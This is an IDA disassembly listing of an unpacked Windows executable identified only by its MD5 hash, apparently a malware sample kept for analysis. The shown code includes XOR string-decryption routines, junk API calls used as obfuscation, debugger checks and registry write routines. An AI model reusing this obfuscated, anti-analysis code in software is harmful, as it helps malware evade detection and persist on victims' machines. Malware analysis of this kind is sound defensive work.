;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
; Input MD5 : B4EF2D806A19716EAAA1530C02F073FA
; File Name : u:\work\b4ef2d806a19716eaaa1530c02f073fa_unpacked.exe
; Format : Portable executable for 80386 (PE)
; Imagebase : 400000
; Section 1. (virtual address 00001000)
; Virtual size : 0000C000 ( 49152.)
; Section size in file : 0000C000 ( 49152.)
; Offset to raw data for section: 00001000
; Flags C0000040: Data Readable Writable
; Alignment : default
unicode macro page,string,zero
irpc c,<string>
db '&c', page
endm
ifnb <zero>
dw zero
endif
endm
.686p
.mmx
.model flat
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write
_text segment para public 'DATA' use32
assume cs:_text
;org 401000h
assume es:nothing, ss:nothing, ds:_data, fs:nothing, gs:nothing
; =============== S U B R O U T I N E =======================================
sub_401000 proc near ; DATA XREF: sub_401020+A�o
; sub_43DFC9+A�o
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_C = dword ptr 10h
xor eax, eax
inc eax
mov ecx, [esp+arg_0]
test dword ptr [ecx+4], 6
jz short locret_40101F
mov eax, [esp+arg_4]
mov edx, [esp+arg_C]
mov [edx], eax
mov eax, 3
locret_40101F: ; CODE XREF: sub_401000+E�j
retn
sub_401000 endp
; =============== S U B R O U T I N E =======================================
sub_401020 proc near ; CODE XREF: sub_40109A+BE�p
; sub_40109A+EC�p
var_14 = dword ptr -14h
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebx
push esi
push edi
mov eax, [esp+0Ch+arg_0]
push eax
push 0FFFFFFFEh
push offset sub_401000
push large dword ptr fs:0
mov large fs:0, esp
loc_40103D: ; CODE XREF: sub_401020+44�j
; sub_401020+4A�j
mov eax, [esp+1Ch+arg_0]
mov ebx, [eax+8]
mov esi, [eax+0Ch]
cmp esi, 0FFFFFFFFh
jz short loc_40106C
cmp esi, [esp+1Ch+arg_4]
jz short loc_40106C
lea esi, [esi+esi*2]
mov ecx, [ebx+esi*4]
mov ecx, [esp+1Ch+var_14]
mov ecx, [eax+0Ch]
cmp dword ptr [ebx+esi*4+4], 0
jnz short loc_40103D
call dword ptr [ebx+esi*4+8]
jmp short loc_40103D
; ---------------------------------------------------------------------------
loc_40106C: ; CODE XREF: sub_401020+2A�j
; sub_401020+30�j
pop large dword ptr fs:0
add esp, 0Ch
pop edi
pop esi
pop ebx
retn
sub_401020 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40107A proc near ; CODE XREF: sub_40109A+B1�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ebx
push esi
push edi
push ebp
push 0
push 0
push offset sub_401092
push [ebp+arg_0]
call sub_40C694 ; RtlUnwind
sub_40107A endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_401092 proc near ; DATA XREF: sub_40107A+B�o
; sub_43E023+B�o
pop ebp
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_401092 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40109A proc near ; DATA XREF: sub_401219+10�o
; sub_407F67+A�o ...
var_14 = dword ptr -14h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
cld
push ebp
mov ebp, esp
sub esp, 8
push ebx
push esi
push edi
push ebp
mov ebx, [ebp+arg_4]
mov eax, [ebp+arg_0]
mov dword_43B08C, eax
mov dword_43B090, ebx
test dword ptr [eax+4], 6
jnz loc_40117F
mov [ebp+var_8], eax
mov eax, [ebp+arg_8]
mov [ebp+var_4], eax
mov dword_43B090, eax
lea eax, [ebp+var_8]
mov [ebx-4], eax
mov esi, [ebx+0Ch]
mov edi, [ebx+8]
loc_4010DD: ; CODE XREF: sub_40109A+DC�j
cmp esi, 0FFFFFFFFh
jz loc_40118E
lea ecx, [esi+esi*2]
cmp dword ptr [edi+ecx*4+4], 0
jz short loc_40116D
push esi
push ebp
lea ebp, [ebx+10h]
mov eax, [ebp+var_14]
mov eax, [eax]
mov eax, [eax]
mov dword_43B030, eax
mov edx, [ebp+var_14]
mov eax, [edx]
mov dword_43B034, eax
mov eax, [edx+4]
mov dword_43B038, eax
push esi
push edi
push ecx
mov ecx, 14h
lea edi, dword_43B03C
mov esi, dword_43B034
rep movsd
lea edi, dword_43B03C
mov dword_43B034, edi
pop ecx
pop edi
pop esi
call dword ptr [edi+ecx*4+4]
pop ebp
pop esi
mov ebx, [ebp+arg_4]
or eax, eax
jz short loc_40116D
js short loc_40117B
mov edi, [ebx+8]
push ebx
call sub_40107A
add esp, 4
lea ebp, [ebx+10h]
push esi
push ebx
call sub_401020
add esp, 8
lea ecx, [esi+esi*2]
mov eax, [edi+ecx*4]
mov eax, [ebx+0Ch]
call dword ptr [edi+ecx*4+8]
loc_40116D: ; CODE XREF: sub_40109A+54�j
; sub_40109A+A9�j
mov edi, [ebx+8]
lea ecx, [esi+esi*2]
mov esi, [edi+ecx*4]
jmp loc_4010DD
; ---------------------------------------------------------------------------
loc_40117B: ; CODE XREF: sub_40109A+AB�j
xor eax, eax
jmp short loc_4011F0
; ---------------------------------------------------------------------------
loc_40117F: ; CODE XREF: sub_40109A+23�j
push ebp
lea ebp, [ebx+10h]
push 0FFFFFFFFh
push ebx
call sub_401020
add esp, 0Ch
loc_40118E: ; CODE XREF: sub_40109A+46�j
push 0
mov dword_43B010, 0Bh
push 0Bh
call sub_40CA24
add esp, 8
or eax, eax
jnz short loc_4011C9
push 0
mov dword_43B010, 8
push 8
call sub_40CA24
add esp, 8
or eax, eax
jnz short loc_4011C9
mov eax, 1
jmp short loc_4011F0
; ---------------------------------------------------------------------------
loc_4011C9: ; CODE XREF: sub_40109A+10C�j
; sub_40109A+126�j
cmp eax, 0FFFFFFFFh
jz short loc_4011F8
push eax
push dword_43B010
call sub_40CA24
add esp, 8
push dword_43B010
call sub_40CA0C
add esp, 4
mov eax, 1
loc_4011F0: ; CODE XREF: sub_40109A+E3�j
; sub_40109A+12D�j ...
pop ebp
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
loc_4011F8: ; CODE XREF: sub_40109A+132�j
cmp dword_43B02C, 0
jnz short loc_401208
mov eax, 1
jmp short loc_4011F0
; ---------------------------------------------------------------------------
loc_401208: ; CODE XREF: sub_40109A+165�j
mov eax, dword_43B02C
push 0Bh
jmp eax
sub_40109A endp
; ---------------------------------------------------------------------------
pop eax
mov eax, 1
jmp short loc_4011F0
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401219 proc near ; CODE XREF: start+500�j
; DATA XREF: start:loc_4494FC�o
var_30 = word ptr -30h
var_18 = dword ptr -18h
var_4 = dword ptr -4
mov eax, large fs:0
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_43B01C
push offset sub_40109A
push eax
mov large fs:0, esp
sub esp, 10h
push ebx
push esi
push edi
mov [ebp+var_18], esp
push eax
fnstcw [esp+30h+var_30]
or [esp+30h+var_30], 300h
fldcw [esp+30h+var_30]
add esp, 4
push 0
push 0
push offset dword_43B028
push offset dword_43B024
push offset dword_43B020
call sub_40C9AC
push dword_43B028
push dword_43B024
push dword_43B020
mov dword_43B014, esp
call sub_40C434
add esp, 18h
xor ecx, ecx
mov [ebp+var_4], ecx
push eax
call sub_40C9DC
leave
retn
sub_401219 endp
; ---------------------------------------------------------------------------
mov large fs:0, eax
retn
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40129C proc near ; CODE XREF: sub_408E89+1E�p
; sub_408E89+3A�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push esi
push edi
mov esi, [ebp+arg_4]
push esi
push [ebp+arg_0]
mov eax, dword_43B09C
lea eax, ds:41A870h[eax]
push eax
call sub_40C9F4
add esp, 0Ch
xor edi, edi
jmp short loc_4012DC
; ---------------------------------------------------------------------------
loc_4012C2: ; CODE XREF: sub_40129C+42�j
mov eax, dword_43B09C
add eax, edi
lea eax, ds:41A870h[eax]
movsx edx, byte ptr [eax]
xor edx, 0ADh
mov [eax], dl
inc edi
loc_4012DC: ; CODE XREF: sub_40129C+24�j
cmp edi, esi
jl short loc_4012C2
mov [ebp+var_4], 1A7h
mov eax, dword_43B09C
add eax, esi
mov byte ptr ds:dword_41A870[eax], 0
mov edi, dword_43B09C
add dword_43B09C, 2
mov eax, dword_43B09C
lea eax, [eax+esi+2]
mov dword_43B09C, eax
inc dword_43B09C
cmp dword_43B09C, 0DB6h
jle short loc_40132A
and dword_43B09C, 0
loc_40132A: ; CODE XREF: sub_40129C+85�j
lea eax, dword_41A870[edi]
pop edi
pop esi
leave
retn
sub_40129C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401334 proc near ; CODE XREF: sub_408189+111�p
var_14C23 = byte ptr -14C23h
var_14C1E = byte ptr -14C1Eh
var_14C18 = dword ptr -14C18h
var_14C12 = byte ptr -14C12h
var_A = byte ptr -0Ah
var_9 = byte ptr -9
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
mov eax, 14C24h
call sub_40C498
push ebx
push esi
push edi
call sub_40C574 ; GetProcessHeap
lea edi, [ebp+var_14C1E]
lea esi, aVk ; " vK%;"
mov ecx, 3
rep movsw
call sub_40C514 ; GetCurrentThreadId
push 0
push 0
push 3
push 0
push 0
push 80000000h
push offset dword_40F280
call sub_40C67C ; CreateFileA
mov [ebp+var_4], eax
cmp eax, 0FFFFFFFFh
jnz short loc_40138A
xor eax, eax
jmp loc_401424
; ---------------------------------------------------------------------------
loc_40138A: ; CODE XREF: sub_401334+4D�j
mov [ebp+var_8], 5F3Bh
mov eax, [ebp+var_8]
mov edx, eax
add edx, eax
mov [ebp+var_8], edx
push 0
lea eax, [ebp+var_14C18]
push eax
push 14C08h
lea eax, [ebp+var_14C12]
push eax
push [ebp+var_4]
call sub_40C688 ; ReadFile
mov [ebp+var_9], 0B7h
sub [ebp+var_9], 77h
push [ebp+var_4]
call sub_40C55C ; CloseHandle
mov [ebp+var_A], 22h
sub [ebp+var_A], 6Ch
xor ebx, ebx
loc_4013D2: ; CODE XREF: sub_401334+D9�j
mov eax, 0Dh
sub eax, dword_43B098
push eax
push offset byte_432F00
lea eax, [ebp+ebx+var_14C12]
push eax
call sub_401806
add esp, 0Ch
cmp eax, 0FFFFh
jz short loc_4013FF
xor eax, eax
inc eax
jmp short loc_401424
; ---------------------------------------------------------------------------
loc_4013FF: ; CODE XREF: sub_401334+C4�j
call sub_40C538 ; RtlGetLastWin32Error
add ebx, 11h
cmp ebx, [ebp+var_14C18]
jb short loc_4013D2
lea edi, [ebp+var_14C23]
lea esi, aByxy ; "Byxy"
mov ecx, 5
rep movsb
xor eax, eax
loc_401424: ; CODE XREF: sub_401334+51�j
; sub_401334+C9�j
pop edi
pop esi
pop ebx
leave
retn
sub_401334 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 0Ch
push esi
push edi
mov esi, [ebp+0Ch]
mov dword ptr [ebp-4], 2ADh
push esi
push dword ptr [ebp+8]
mov eax, dword_43B234
lea eax, ds:4196E0h[eax]
push eax
call sub_40C9F4
add esp, 0Ch
xor edi, edi
jmp short loc_401472
; ---------------------------------------------------------------------------
loc_401458: ; CODE XREF: .text:00401474�j
mov eax, dword_43B234
add eax, edi
lea eax, ds:4196E0h[eax]
movsx edx, byte ptr [eax]
xor edx, 0ACh
mov [eax], dl
inc edi
loc_401472: ; CODE XREF: .text:00401456�j
cmp edi, esi
jl short loc_401458
mov dword ptr [ebp-8], 194h
mov eax, dword_43B234
add eax, esi
mov byte ptr ds:dword_4196E0[eax], 0
mov edi, dword_43B234
mov eax, edi
add eax, 2
add eax, esi
mov dword_43B234, eax
cmp eax, 0DF0h
jle short loc_4014AC
and dword_43B234, 0
loc_4014AC: ; CODE XREF: .text:004014A3�j
mov dword ptr [ebp-0Ch], 3DCh
lea eax, dword_4196E0[edi]
pop edi
pop esi
leave
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4014BD proc near ; CODE XREF: sub_4062CD+D3�p
; sub_408BE4+E6�p ...
var_14 = byte ptr -14h
var_F = byte ptr -0Fh
var_A = byte ptr -0Ah
var_5 = byte ptr -5
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
sub esp, 14h
push ebx
push esi
push edi
lea edi, [ebp+var_A]
lea esi, aMI5 ; "m i5"
mov ecx, 5
rep movsb
lea eax, [ebp+var_4]
push eax
push 20019h
push 0
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40C934 ; RegOpenKeyExA
mov ebx, eax
lea edi, [ebp+var_F]
lea esi, a4Ec ; "4%ec"
mov ecx, 5
rep movsb
or ebx, ebx
jz short loc_401506
xor eax, eax
jmp short loc_401549
; ---------------------------------------------------------------------------
loc_401506: ; CODE XREF: sub_4014BD+43�j
lea edi, [ebp+var_14]
lea esi, aXuT ; "xU t"
mov ecx, 5
rep movsb
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_14]
push 0
push [ebp+arg_8]
push [ebp+var_4]
call sub_40C940 ; RegQueryValueExA
mov ebx, eax
mov [ebp+var_5], 0F0h
add [ebp+var_5], 0ABh
push [ebp+var_4]
call sub_40C928 ; RegCloseKey
or ebx, ebx
jz short loc_401546
xor eax, eax
jmp short loc_401549
; ---------------------------------------------------------------------------
loc_401546: ; CODE XREF: sub_4014BD+83�j
xor eax, eax
inc eax
loc_401549: ; CODE XREF: sub_4014BD+47�j
; sub_4014BD+87�j
pop edi
pop esi
pop ebx
leave
retn
sub_4014BD endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 0Ch
push esi
push edi
mov esi, [ebp+0Ch]
mov dword ptr [ebp-4], 3B4h
push esi
push dword ptr [ebp+8]
mov eax, dword_43B250
lea eax, ds:433FF0h[eax]
push eax
call sub_40C9F4
add esp, 0Ch
xor edi, edi
jmp short loc_401597
; ---------------------------------------------------------------------------
loc_40157D: ; CODE XREF: .text:00401599�j
mov eax, dword_43B250
add eax, edi
lea eax, ds:433FF0h[eax]
movsx edx, byte ptr [eax]
xor edx, 0E6h
mov [eax], dl
inc edi
loc_401597: ; CODE XREF: .text:0040157B�j
cmp edi, esi
jl short loc_40157D
mov dword ptr [ebp-8], 153h
mov eax, dword_43B250
add eax, esi
mov byte ptr ds:dword_433FF0[eax], 0
mov edi, dword_43B250
add dword_43B250, 3
mov eax, dword_43B250
lea eax, [eax+esi+6]
mov dword_43B250, eax
cmp eax, 0DFFh
jle short loc_4015DA
and dword_43B250, 0
loc_4015DA: ; CODE XREF: .text:004015D1�j
mov dword ptr [ebp-0Ch], 3D1h
lea eax, dword_433FF0[edi]
pop edi
pop esi
leave
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4015EB proc near ; CODE XREF: sub_405F79+9F�p
; sub_405F79+D8�p ...
var_D = byte ptr -0Dh
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
sub esp, 10h
push ebx
push esi
push edi
call sub_40C634 ; IsDebuggerPresent
call sub_40C514 ; GetCurrentThreadId
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_4]
push eax
push 0
push 0F003Fh
push 0
push 0
push 0
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40C91C ; RegCreateKeyExA
mov ebx, eax
or ebx, ebx
jz short loc_401628
xor eax, eax
jmp short loc_401675
; ---------------------------------------------------------------------------
loc_401628: ; CODE XREF: sub_4015EB+37�j
lea edi, [ebp+var_D]
lea esi, aDGu ; "D GU"
mov ecx, 5
rep movsb
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_14]
push 0
push [ebp+arg_8]
push [ebp+var_4]
call sub_40C94C ; RegSetValueExA
mov ebx, eax
push [ebp+var_4]
call sub_40C928 ; RegCloseKey
or ebx, ebx
jz short loc_401660
xor eax, eax
jmp short loc_401675
; ---------------------------------------------------------------------------
loc_401660: ; CODE XREF: sub_4015EB+6F�j
call sub_40C5A4 ; GetVersion
cmp [ebp+var_8], 1
jnz short loc_401672
mov eax, 2
jmp short loc_401675
; ---------------------------------------------------------------------------
loc_401672: ; CODE XREF: sub_4015EB+7E�j
xor eax, eax
inc eax
loc_401675: ; CODE XREF: sub_4015EB+3B�j
; sub_4015EB+73�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_4015EB endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push ecx
push eax
push esi
push edi
mov esi, [ebp+0Ch]
push esi
push dword ptr [ebp+8]
mov eax, dword_43B264
lea eax, ds:437190h[eax]
push eax
call sub_40C9F4
add esp, 0Ch
mov dword ptr [ebp-4], 5Fh
xor edi, edi
jmp short loc_4016BF
; ---------------------------------------------------------------------------
loc_4016A8: ; CODE XREF: .text:004016C1�j
mov eax, dword_43B264
add eax, edi
lea eax, ds:437190h[eax]
movsx edx, byte ptr [eax]
xor edx, 0Eh
mov [eax], dl
inc edi
loc_4016BF: ; CODE XREF: .text:004016A6�j
cmp edi, esi
jl short loc_4016A8
mov eax, dword_43B264
add eax, esi
mov byte ptr ds:dword_437190[eax], 0
xor edi, edi
mov edi, dword_43B264
mov eax, edi
inc eax
add eax, esi
mov dword_43B264, eax
add dword_43B264, 3
cmp dword_43B264, 0DE6h
jle short loc_4016FE
and dword_43B264, 0
loc_4016FE: ; CODE XREF: .text:004016F5�j
mov dword ptr [ebp-8], 6
lea eax, dword_437190[edi]
pop edi
pop esi
leave
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40170F proc near ; CODE XREF: sub_405601+166�p
; sub_408BE4+3A�p ...
var_4 = byte ptr -4
var_1 = byte ptr -1
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ebx
push esi
push edi
mov [ebp+var_1], 9Fh
add [ebp+var_1], 0CBh
lea edi, [ebp+var_4]
lea esi, dword_43B268
mov ecx, 3
rep movsb
xor ebx, ebx
jmp short loc_40175A
; ---------------------------------------------------------------------------
loc_401732: ; CODE XREF: sub_40170F+4E�j
call sub_40CA18
mov edi, [ebp+arg_0]
mov edx, 10624DD3h
push ecx
mov ecx, eax
imul edx
sar edx, 7
sar ecx, 1Fh
sub edx, ecx
mov eax, edx
pop ecx
mov esi, eax
add esi, 61h
mov edx, esi
mov [edi+ebx], dl
inc ebx
loc_40175A: ; CODE XREF: sub_40170F+21�j
cmp ebx, [ebp+arg_4]
jl short loc_401732
mov eax, [ebp+arg_4]
mov edx, [ebp+arg_0]
mov byte ptr [edx+eax], 0
mov eax, edx
pop edi
pop esi
pop ebx
leave
retn
sub_40170F endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push ecx
push esi
push edi
mov esi, [ebp+0Ch]
push esi
push dword ptr [ebp+8]
mov eax, dword_43B274
lea eax, ds:42EBA0h[eax]
push eax
call sub_40C9F4
add esp, 0Ch
mov dword ptr [ebp-4], 1Ah
xor edi, edi
jmp short loc_4017B4
; ---------------------------------------------------------------------------
loc_40179D: ; CODE XREF: .text:004017B6�j
mov eax, dword_43B274
add eax, edi
lea eax, ds:42EBA0h[eax]
movsx edx, byte ptr [eax]
xor edx, 48h
mov [eax], dl
inc edi
loc_4017B4: ; CODE XREF: .text:0040179B�j
cmp edi, esi
jl short loc_40179D
mov eax, dword_43B274
add eax, esi
mov byte ptr ds:dword_42EBA0[eax], 0
mov edi, dword_43B274
add dword_43B274, 3
mov eax, dword_43B274
lea eax, [eax+esi+6]
mov dword_43B274, eax
add dword_43B274, 2
cmp dword_43B274, 0DD9h
jle short loc_4017FC
and dword_43B274, 0
loc_4017FC: ; CODE XREF: .text:004017F3�j
lea eax, dword_42EBA0[edi]
pop edi
pop esi
leave
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401806 proc near ; CODE XREF: sub_401334+B7�p
; sub_4053A1+57�p ...
var_11 = byte ptr -11h
var_10 = byte ptr -10h
var_D = byte ptr -0Dh
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 14h
push ebx
push esi
push edi
mov [ebp+var_D], 9Fh
add [ebp+var_D], 0CBh
and [ebp+var_C], 0
lea edi, [ebp+var_10]
lea esi, dword_43B278
mov ecx, 3
rep movsb
and [ebp+var_8], 0
jmp short loc_4018AA
; ---------------------------------------------------------------------------
loc_401831: ; CODE XREF: sub_401806+B6�j
call sub_40C634 ; IsDebuggerPresent
and [ebp+var_4], 0
call sub_40C598 ; GetTickCount
xor ebx, ebx
jmp short loc_401894
; ---------------------------------------------------------------------------
loc_401843: ; CODE XREF: sub_401806+9F�j
mov [ebp+var_11], 37h
add [ebp+var_11], 1
mov eax, [ebp+var_8]
add eax, ebx
mov edx, [ebp+arg_0]
movsx eax, byte ptr [edx+eax]
mov edx, [ebp+arg_4]
movsx edx, byte ptr [edx+ebx]
cmp eax, edx
jnz short loc_401865
inc [ebp+var_4]
loc_401865: ; CODE XREF: sub_401806+5A�j
mov eax, [ebp+arg_4]
mov ecx, eax
or eax, 0FFFFFFFFh
loc_40186D: ; CODE XREF: sub_401806+6C�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_40186D
cmp [ebp+var_4], eax
jnz short loc_401893
call sub_40C5A4 ; GetVersion
inc [ebp+var_C]
call sub_40C574 ; GetProcessHeap
mov eax, [ebp+arg_8]
cmp [ebp+var_C], eax
jnz short loc_401893
mov eax, [ebp+var_8]
jmp short loc_4018C7
; ---------------------------------------------------------------------------
loc_401893: ; CODE XREF: sub_401806+71�j
; sub_401806+86�j
inc ebx
loc_401894: ; CODE XREF: sub_401806+3B�j
mov eax, [ebp+arg_4]
mov ecx, eax
or eax, 0FFFFFFFFh
loc_40189C: ; CODE XREF: sub_401806+9B�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_40189C
cmp ebx, eax
jb short loc_401843
inc [ebp+var_8]
loc_4018AA: ; CODE XREF: sub_401806+29�j
mov eax, [ebp+arg_0]
mov ecx, eax
or eax, 0FFFFFFFFh
loc_4018B2: ; CODE XREF: sub_401806+B1�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_4018B2
cmp [ebp+var_8], eax
jb loc_401831
mov eax, 0FFFFh
loc_4018C7: ; CODE XREF: sub_401806+8B�j
pop edi
pop esi
pop ebx
leave
retn
sub_401806 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push ecx
push eax
push esi
push edi
mov esi, [ebp+0Ch]
push esi
push dword ptr [ebp+8]
mov eax, dword_43B284
lea eax, ds:415600h[eax]
push eax
call sub_40C9F4
add esp, 0Ch
mov dword ptr [ebp-4], 5Fh
xor edi, edi
jmp short loc_401911
; ---------------------------------------------------------------------------
loc_4018FA: ; CODE XREF: .text:00401913�j
mov eax, dword_43B284
add eax, edi
lea eax, ds:415600h[eax]
movsx edx, byte ptr [eax]
xor edx, 0Eh
mov [eax], dl
inc edi
loc_401911: ; CODE XREF: .text:004018F8�j
cmp edi, esi
jl short loc_4018FA
mov eax, dword_43B284
add eax, esi
mov byte ptr ds:dword_415600[eax], 0
xor edi, edi
mov edi, dword_43B284
mov eax, edi
inc eax
add eax, esi
mov dword_43B284, eax
add dword_43B284, 3
cmp dword_43B284, 0DE6h
jle short loc_401950
and dword_43B284, 0
loc_401950: ; CODE XREF: .text:00401947�j
mov dword ptr [ebp-8], 6
lea eax, dword_415600[edi]
pop edi
pop esi
leave
retn
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push ecx
push eax
push ebx
push esi
push edi
call sub_40C508 ; GetCurrentProcessId
lea edi, [ebp-7]
lea esi, dword_43B288
mov ecx, 7
rep movsb
mov ebx, [ebp+10h]
jmp short loc_4019A0
; ---------------------------------------------------------------------------
loc_401983: ; CODE XREF: .text:004019A3�j
mov eax, [ebp+8]
movsx eax, byte ptr [eax+ebx]
mov edx, ebx
sub edx, [ebp+10h]
mov ecx, [ebp+0Ch]
movsx edx, byte ptr [ecx+edx]
cmp eax, edx
jz short loc_40199F
xor eax, eax
inc eax
jmp short loc_4019AC
; ---------------------------------------------------------------------------
loc_40199F: ; CODE XREF: .text:00401998�j
inc ebx
loc_4019A0: ; CODE XREF: .text:00401981�j
cmp ebx, [ebp+14h]
jl short loc_401983
call sub_40C538 ; RtlGetLastWin32Error
xor eax, eax
loc_4019AC: ; CODE XREF: .text:0040199D�j
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push esi
push edi
mov esi, [ebp+0Ch]
push esi
push dword ptr [ebp+8]
mov eax, dword_43B298
lea eax, ds:433000h[eax]
push eax
call sub_40C9F4
add esp, 0Ch
xor edi, edi
jmp short loc_4019F0
; ---------------------------------------------------------------------------
loc_4019D6: ; CODE XREF: .text:004019F2�j
mov eax, dword_43B298
add eax, edi
lea eax, ds:433000h[eax]
movsx edx, byte ptr [eax]
xor edx, 8Ah
mov [eax], dl
inc edi
loc_4019F0: ; CODE XREF: .text:004019D4�j
cmp edi, esi
jl short loc_4019D6
mov eax, dword_43B298
add eax, esi
mov byte ptr ds:dword_433000[eax], 0
mov edi, dword_43B298
inc dword_43B298
mov eax, dword_43B298
add eax, 4
add eax, esi
mov dword_43B298, eax
cmp eax, 0DCFh
jle short loc_401A2C
and dword_43B298, 0
loc_401A2C: ; CODE XREF: .text:00401A23�j
lea eax, dword_433000[edi]
pop edi
pop esi
pop ebp
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401A36 proc near ; CODE XREF: sub_405601+4A�p
; sub_4062CD+470�p ...
var_1D = byte ptr -1Dh
var_1C = dword ptr -1Ch
var_15 = dword ptr -15h
var_11 = byte ptr -11h
var_10 = byte ptr -10h
var_9 = byte ptr -9
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 20h
push ebx
push esi
push edi
lea edi, [ebp+var_9]
lea esi, byte_43B29C
xor ecx, ecx
inc ecx
rep movsb
push 0
push 80h
push 3
push 0
push 3
push 80000000h
push [ebp+arg_0]
call sub_40C67C ; CreateFileA
mov ebx, eax
call sub_40C508 ; GetCurrentProcessId
cmp ebx, 0FFFFFFFFh
jnz short loc_401AA2
mov [ebp+var_1C], 0D77h
mov eax, [ebp+var_1C]
mov edx, eax
add edx, eax
mov [ebp+var_1C], edx
cmp [ebp+arg_4], 0
jz short loc_401A90
mov eax, [ebp+arg_4]
and dword ptr [eax], 0
loc_401A90: ; CODE XREF: sub_401A36+52�j
lea edi, [ebp+var_1D]
lea esi, byte_43B29D
xor ecx, ecx
inc ecx
rep movsb
xor eax, eax
jmp short loc_401B0C
; ---------------------------------------------------------------------------
loc_401AA2: ; CODE XREF: sub_401A36+3B�j
push 0
push ebx
call sub_40C520 ; GetFileSize
mov [ebp+var_4], eax
call sub_40C538 ; RtlGetLastWin32Error
mov eax, [ebp+var_4]
add eax, 10h
push eax
push 40h
call sub_40C64C ; LocalAlloc
mov [ebp+var_8], eax
call sub_40C634 ; IsDebuggerPresent
push 0
cmp [ebp+arg_4], 0
jz short loc_401AD8
mov eax, [ebp+arg_4]
mov [ebp+var_1C], eax
jmp short loc_401ADE
; ---------------------------------------------------------------------------
loc_401AD8: ; CODE XREF: sub_401A36+98�j
lea eax, [ebp+var_10]
mov [ebp+var_1C], eax
loc_401ADE: ; CODE XREF: sub_401A36+A0�j
push [ebp+var_1C]
push [ebp+var_4]
push [ebp+var_8]
push ebx
call sub_40C688 ; ReadFile
lea edi, [ebp+var_11]
lea esi, byte_43B29E
xor ecx, ecx
inc ecx
rep movsb
push ebx
call sub_40C55C ; CloseHandle
mov eax, dword_43B29F
mov [ebp+var_15], eax
mov eax, [ebp+var_8]
loc_401B0C: ; CODE XREF: sub_401A36+6A�j
pop edi
pop esi
pop ebx
leave
retn
sub_401A36 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push ecx
push eax
push esi
push edi
mov esi, [ebp+0Ch]
mov dword ptr [ebp-4], 16Eh
push esi
push dword ptr [ebp+8]
mov eax, dword_43B2AC
lea eax, ds:410850h[eax]
push eax
call sub_40C9F4
add esp, 0Ch
mov dword ptr [ebp-8], 17Eh
xor edi, edi
jmp short loc_401B5D
; ---------------------------------------------------------------------------
loc_401B46: ; CODE XREF: .text:00401B5F�j
mov eax, dword_43B2AC
add eax, edi
lea eax, ds:410850h[eax]
movsx edx, byte ptr [eax]
xor edx, 73h
mov [eax], dl
inc edi
loc_401B5D: ; CODE XREF: .text:00401B44�j
cmp edi, esi
jl short loc_401B46
